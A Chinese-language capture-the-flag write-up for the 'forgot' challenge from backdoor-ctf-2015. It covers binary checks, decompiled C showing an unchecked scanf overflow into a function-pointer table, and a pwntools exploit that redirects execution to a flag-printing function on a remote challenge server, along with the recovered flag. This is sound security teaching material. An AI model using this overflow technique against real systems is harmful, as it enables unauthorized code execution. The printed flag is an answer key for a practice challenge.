CTF – PWN – forgot

题目说明

题目来源: backdoor-ctf-2015

题目: forgot

解题步骤

查看文件类型和安全性,开启了NX,不考虑Shellcode

1
2
3
4
5
6
7
8
9
10
root@kali:~# file forgot 
forgot: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=35930a2d9b048236694e9611073b759e1c88b8c4, stripped

root@kali:~# checksec forgot
[*] '/root/forgot'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

使用IDA32查看主函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
int __cdecl main()
{
size_t v0; // ebx
char v2[32]; // [esp+10h] [ebp-74h]
int (*v3)(); // [esp+30h] [ebp-54h]
int (*v4)(); // [esp+34h] [ebp-50h]
int (*v5)(); // [esp+38h] [ebp-4Ch]
int (*v6)(); // [esp+3Ch] [ebp-48h]
int (*v7)(); // [esp+40h] [ebp-44h]
int (*v8)(); // [esp+44h] [ebp-40h]
int (*v9)(); // [esp+48h] [ebp-3Ch]
int (*v10)(); // [esp+4Ch] [ebp-38h]
int (*v11)(); // [esp+50h] [ebp-34h]
int (*v12)(); // [esp+54h] [ebp-30h]
char s; // [esp+58h] [ebp-2Ch]
int v14; // [esp+78h] [ebp-Ch]
size_t i; // [esp+7Ch] [ebp-8h]

v14 = 1;
v3 = sub_8048604;
v4 = sub_8048618;
v5 = sub_804862C;
v6 = sub_8048640;
v7 = sub_8048654;
v8 = sub_8048668;
v9 = sub_804867C;
v10 = sub_8048690;
v11 = sub_80486A4;
v12 = sub_80486B8;
puts("What is your name?");
printf("> ");
fflush(stdout);
fgets(&s, 32, stdin);
sub_80485DD((int)&s);
fflush(stdout);
printf("I should give you a pointer perhaps. Here: %x\n\n", sub_8048654);
fflush(stdout);
puts("Enter the string to be validate");
printf("> ");
fflush(stdout);
__isoc99_scanf("%s", v2);
for ( i = 0; ; ++i )
{
v0 = i;
if ( v0 >= strlen(v2) )
break;
switch ( v14 )
{
case 1:
if ( sub_8048702(v2[i]) )
v14 = 2;
break;
case 2:
if ( v2[i] == 64 )
v14 = 3;
break;
case 3:
if ( sub_804874C(v2[i]) )
v14 = 4;
break;
case 4:
if ( v2[i] == 46 )
v14 = 5;
break;
case 5:
if ( sub_8048784(v2[i]) )
v14 = 6;
break;
case 6:
if ( sub_8048784(v2[i]) )
v14 = 7;
break;
case 7:
if ( sub_8048784(v2[i]) )
v14 = 8;
break;
case 8:
if ( sub_8048784(v2[i]) )
v14 = 9;
break;
case 9:
v14 = 10;
break;
default:
continue;
}
}
(*(&v3 + --v14))();
return fflush(stdout);
}

同时在函数列表中找到了获取flag的函数

1
2
3
4
5
6
7
int sub_80486CC()
{
char s; // [esp+1Eh] [ebp-3Ah]

snprintf(&s, 0x32u, "cat %s", "./flag");
return system(&s);
}

所以只需要覆盖EIP,就能获得flag,使用pwntools的cyclic()构造100位字符串

1
2
3
>>> from pwn import *
>>> cyclic(100)
'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'

在gdb中输入字符串后查看EIP的值

1
2
(gdb) info registers eip
eip 0x61617261 0x61617261

由于寄存器的值是十六进制而且是倒序的,所以写个脚本恢复

1
2
3
4
5
6
7
text = ''
char_list = []
char = '61617261'
for i in range(0,len(char),2):char_list.append(char[i:i+2])
char_list.reverse()
for i in char_list: text+=chr(int(i,16))
print(text)

运行得到araa,用cyclic_find寻找位置,到EIP的偏移为63

1
2
>>> cyclic_find('araa')-4
63

编写exp

1
2
3
4
5
6
7
8
9
from pwn import *

p = remote('111.198.29.45','50785')

p.recv()
payload = 'A'*63 + p32(0x080486cc)

p.sendline(payload)
p.interactive()

运行得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~# python exp.py 
[+] Opening connection to 111.198.29.45 on port 50785: Done
[*] Switching to interactive mode

Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Finite-State Automaton

I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address

Cheers!

I should give you a pointer perhaps. Here: 8048654

Enter the string to be validate
> cyberpeace{a454211e63e1e59977d045f3d593de0f}